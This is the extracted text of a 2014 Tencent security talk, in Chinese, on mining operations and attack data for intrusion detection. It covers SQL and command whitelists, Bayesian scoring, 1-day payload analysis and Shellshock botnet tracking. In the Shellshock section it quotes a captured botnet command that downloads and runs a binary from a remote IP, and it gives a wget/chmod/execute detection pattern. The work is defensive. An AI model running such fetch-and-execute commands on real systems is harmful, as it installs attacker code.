掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11
Who am i 江 虎 xti9er 10 多 年 安 全 研 究 与 从 业 经 验 10 年 加 入 腾 讯 入 侵 检 测 体 系 建 设 应 急 响 应 安 全 培 训 入 侵 对 抗 团 队
掘 金 安 全 数 据 安 全 工 作 的 困 境 历 史 案 例 的 启 示 榨 取 数 据 剩 余 价 值 开 放 & 合 作 Q&A
安 全 工 作 的 困 境 建 设 的 系 统 = 我 们 的 能 力 能 力 = 积 累 我 们 的 局 限 = 系 统 的 局 限 唯 快 不 破 向 数 据 学 习 怎 么 破!?
安 全 工 作 的 困 境 防 住 漏 洞 就 能 阻 断 入 侵? 社 工 入 \ 弱 口 令 \ 撞 库 入 侵 算 漏 洞 吗? 无 鉴 权 的 管 理 后 台 \ACL 不 严 算 漏 洞 吗? 入 侵 检 测!= 漏 洞 检 测 1day 能 否 及 时 感 知? 通 过 口 口 相 传, 江 湖 传 闻? 等 各 安 全 资 讯 网 站 发 布 消 息? 看 新 闻? 检 测 能 力 的 更 新 速 度 取 决 于 对 威 胁 的 感 知 速 度
我 们 有 什 么? 几 十 万 台 服 务 器? NO, 在 我 眼 里 这 是 几 十 万 个 蜜 罐! 200T+/ 天 安 全 数 据 亿 次 攻 击 请 求 Web 攻 击 扫 描 暴 力 破 解 木 马
如 何 理 解 安 全 数 据 基 础 运 维 审 计 数 据 DB 审 计 运 维 命 令 入 侵 检 测 系 统 告 警 数 据 IDS\IPS 可 疑 行 为 黑 客 行 为 违 规 操 作 扫 描 数 据 端 口 扫 描 \ 暴 力 破 解 \WAF
提 炼 运 维 数 据 小 型 网 络 \ 单 一 业 务 特 点 运 维 习 惯 ( 命 令 ) 固 定 代 码 风 格 (CGI 文 件 ) 固 定 DB(sql) 操 作 固 定 Discuz\wordpress 如 何 快 速 甄 别 异 常 非 我 们 熟 悉 的 行 为 均 为 异 常 提 炼 熟 悉 的 行 为 白 名 单 非 白 即 黑
运 维 数 据 白 名 单 文 件 MD5 Tripwire 命 令 参 数 \ 目 录 \ 用 户 \ 时 间 Sql 语 句 语 法 树 解 析 (sqlparse)
Sql 白 名 单 开 源 系 统 固 定 sql 语 句, 仅 参 数 变 化 Sql 注 入 Keyword.DML SELECT 联 合 查 询 -payload 依 附 于 业 务 逻 辑 sql 语 句 中 Wildcard Keyword Identifier Where 多 分 支 查 * 询 -payload FROM 希 望 获 取 业 务 数 据 之 外 的 内 容 Name users 白 名 单 模 型 Keyword WHERE Comparison Statement Operator.Comparison Identifier Srcip+user+function+parameter Identifier = Keyword AND Comparison Identifier Punctuation ; Operator.Comparison = Comment.Single -- AND password= tricky ; Identifier Name username Literal.String.Single greg Name password Literal.String.Single secret
白 名 单 优 劣 学 习 周 期 过 长 滞 后 性 - 增 量 数 据 易 误 报 适 用 于 某 些 特 定 业 务 \ 核 心 业 务 结 论 单 一 系 统 缺 陷 由 多 系 统 配 合 弥 补 ( 白 加 黑 ) 业 务 种 类 较 多 的 网 络 不 适 用
历 史 案 例 说 明 了 什 么 那 些 无 法 定 性 的 可 疑 事 件 有 价 值 吗? 下 载 外 网 文 件 \ 编 译 文 件 非 漏 洞 非 木 马 恶 意 行 为 如 何 检 测? 通 过 弱 口 令 进 入 系 统 dump 数 据 编 译 部 署 一 个 文 件 传 输 工 具 Wget-> 解 压 -> 执 行 步 骤 一 定 是 相 同 的 吗? 固 化 的 关 联 规 则 还 有 其 他 组 合 方 式 吗? 如 何 穷 尽? sqlinject Nmap Weakpass shell Web? Scan?
贝 叶 斯 贝 叶 斯 决 策 理 论 方 法 是 统 计 模 型 决 策 中 的 一 个 基 本 方 法 假 定 B1,B2, 是 某 个 过 程 的 若 干 可 能 的 前 提, 则 P(Bi) 是 人 们 事 先 对 各 前 提 条 件 出 现 可 能 性 大 小 的 估 计, 称 之 为 先 验 概 率 如 果 这 个 过 程 得 到 了 一 个 结 果 A, 那 么 贝 叶 斯 公 式 提 供 了 我 们 根 据 A 的 出 现 而 对 前 提 条 件 做 出 新 评 价 的 方 法 P(Bi A) 即 是 对 以 A 为 前 提 下 Bi 的 出 现 概 率 的 重 新 认 识, 称 P(Bi A) 为 后 验 概 率 算 法 : 贝 叶 斯 样 本 : 历 史 案 例, 运 维 数 据
算 法 A= 入 侵 概 率 B= 运 维 操 作 概 率 N 联 合 概 率 = 入 侵 事 件 周 期 性 自 主 纠 偏
贝 叶 斯 的 问 题 不 同 业 务 场 景 不 同 风 险 不 同 场 景 举 例 : mysqldump 在 web 前 端 机 与 DB 服 务 器 风 险 级 别 不 同 ssh 登 陆 失 败 在 内 网 和 外 网 风 险 级 别 不 同 腾 讯 云 业 务 : 管 理 服 务 对 外, 用 户 运 维 工 具 各 异, 开 源 CMS 漏 洞 各 异 腾 讯 自 有 业 务 : 运 维 流 程 规 范,web 是 入 侵 主 要 入 口 不 同 的 场 景 和 业 务 需 分 别 建 模 样 本 严 重 不 足, 怎 么 办? 主 动 分 析 对 手 各 类 攻 击 数 据
榨 取 安 全 数 据 价 值 - 分 析 对 手 如 何 向 对 手 学 习 更 多 拓 展 数 据 分 析 纬 度 闭 环 运 营 循 环 迭 代, 完 善 监 测 规 则 发 现 对 手 攻 击 手 法 建 立 检 测 模 型 建 立 对 手 特 征 规 则 风 险 数 据 分 析 对 手 特 征 刻 画
如 何 挖 掘 - 识 别 对 手 猜 猜 看, 这 张 图 有 哪 些 有 价 值 的 细 节? 识 别 对 手 UA 扫 描 器 : 版 权 \ 版 本 声 明 COOKIE NULL 固 定 值 ( 伪 ) 随 机 参 数 PAYLOAD 固 定 回 显 字 符 串 来 源 大 范 围 扫 描 触 发 规 则 已 知 对 手 的 固 定 来 源 IP Spam list
Payload 提 取 数 据 精 炼 解 包 \ 参 数 拆 解 符 合 粗 规 则 的 参 数 范 围 固 化 或 符 合 随 机 规 律 的 payload
Payload 提 取 - 场 景 攻 击 场 景 相 关 Sql 注 入 僵 尸 网 络 语 言 相 关 Php 代 码 注 入 Java 代 码 注 入 Xml APP 相 关 开 源 cms 库 表 CGI\cookie\parameter
识 别 1Days Webapp 指 纹 +payload= (0/1/N)day 通 用 漏 洞 影 响 范 围 猜 猜 这 都 是 什 么 开 源 系 统? 通 用 攻 击 手 法 影 响 范 围 Jsp\php 代 码 注 入? Sql 注 入? 2202 SHELLSHOCK 影 响 CGI TOP10 PHP 漏 洞 CGI TOP5 647 537 513 491 474 414 360 166 126
识 别 1day 的 意 义 自 动 及 时 捕 获 1day 避 免 人 为 因 素 导 致 的 信 息 滞 后 及 时 建 立 防 护 解 决 方 案 自 身 业 务 开 源 APP 腾 讯 云 商 户 使 用 的 主 流 APP 自 身 业 务 Discuz struts 云 商 户 Dedecms Phpcms Wdcp other
Shellshock 漏 洞 现 在 的 趋 势 : 漏 洞 披 露 -> 大 范 围 攻 击 爆 发 几 乎 0 时 差 2014 年 9 月 12 日 Stephane Chazelas 发 现 漏 洞 2014 年 9 月 24 日 US-CERT 发 布 安 全 预 警 2014 年 9 月 25 日 TSRC 启 动 应 急 响 应 机 制 2014 年 9 月 30 日 蠕 虫 大 爆 发 2014/9/1 2014/10/1 2014 年 9 月 25 日 发 现 蠕 虫 2014 年 9 月 26 日 出 现 变 种
Shellshock Worm (2014-09-25 11:20:27) 发 现 Thanks-Rob Worm (2014-09-25 22:35:44) 国 内 僵 尸 网 络 节 点 2014-09-26) 各 种 变 种 满 天 飞
如 何 发 现 僵 尸 网 络 僵 尸 网 络 常 见 架 构 payload Web server 数 据 (payload) 特 点 Bot payload BOT master Web server download 僵 尸 网 络 提 取 逻 辑 payload download Web server download 不 同 攻 击 源 相 同 payload Bot 蠕 虫 僵 尸 网 络 payload download Download server Web server
如 何 发 现 的 shellshock 蠕 虫? 历 史 漏 洞 检 测 规 则 ( 如 :PHP-CGI RCE) WAF 数 据 Payload 分 析 wget -P /tmp http://1.1.1.1/arm;chmod +x /tmp/arm;/tmp/arm 对 手 : 僵 尸 网 络 特 征 下 载 (wget\curl ) + 部 署 (tar\chmod..) + 执 行 (/tmp\perl\php) 发 现 Thanks-Rob 发 现 Thanks- Rob PHP-CGI RCE 僵 尸 网 络 规 则 风 险 数 据 分 析 僵 尸 网 络 特 征
9.25 9.26 9.27 9.28 9.29 9.30 10.1 10.2 10.3 10.4 10.5 10.6 10.7 10.8 10.9 10.10 10.11 10.12 10.13 10.14 10.15 10.16 10.17 10.18 10.19 10.20 10.21 10.22 10.23 10.24 10.25 10.26 运 营 数 据 Shellshock 僵 尸 网 络 趋 势 新 的 僵 尸 网 络 不 断 涌 现 僵 尸 网 络 特 点 : 盈 利 模 式 : 挖 矿 \ 偷 比 特 币 \DDOS Shellshock Botnet 开 发 语 言 :Perl\php\python\java\c\c++\Go 语 言 蠕 虫 平 台 :armeabi\arm\ppc\mips\x86\nodes\sig 对 检 测 能 力 的 帮 助 5 条 单 点 规 则 优 化 10 条 贝 叶 斯 子 规 则 优 化
识 别 僵 尸 网 络 的 意 义 1day 及 时 感 知 假 设 应 急 人 员 在 休 假, 安 全 系 统 如 何 感 知 和 更 新 新 型 攻 击? 研 究 僵 尸 网 络 手 法 工 具 更 新 恶 意 行 为 特 征 库 黑 客 工 具 特 征 与 行 为 研 究 IP 信 誉 库 及 时 更 新 ACL
够 了 吗? 再 大 的 量 也 只 是 整 个 互 联 网 的 一 个 小 数 点 如 何 将 安 全 网 编 织 得 更 大?
开 放 & 合 作 定 期 僵 尸 网 络 \ 恶 意 IP\ 蠕 虫 公 布 僵 尸 网 络 蠕 虫 分 析 分 享 合 作 剿 灭 僵 尸 网 络, 控 制 风 险 影 响 范 围 IP 信 誉 库 蠕 虫 事 件 同 步 0/1day 攻 击 事 件 同 步
运 维 数 据 安 全 事 件 僵 尸 网 络 分 析 总 结 本 议 题 探 讨 一 类 学 习 方 法, 通 过 数 据 自 动 学 习 提 升 安 全 系 统 能 力 单 一 场 景 复 杂 业 务 样 本 采 集 Sql 白 名 单 命 令 白 名 单 贝 叶 斯 模 型 Payload 分 析 0/1/Nday 提 取 僵 尸 网 络 分 析 兵 马 未 动 粮 草 先 行 兵 马 未 动 情 报 先 行 大 中 型 网 络 攻 防 双 方 的 对 抗 有 演 化 成 数 据 优 势 竞 争 的 趋 势
广 告 时 间 如 果 你 发 现 腾 讯 产 品 安 全 漏 洞, 欢 迎 参 加 漏 洞 奖 励 计 划 security.tencent.com 欢 迎 有 志 于 从 事 互 联 网 安 全 的 同 学 加 入 我 们 简 历 security@tencent.com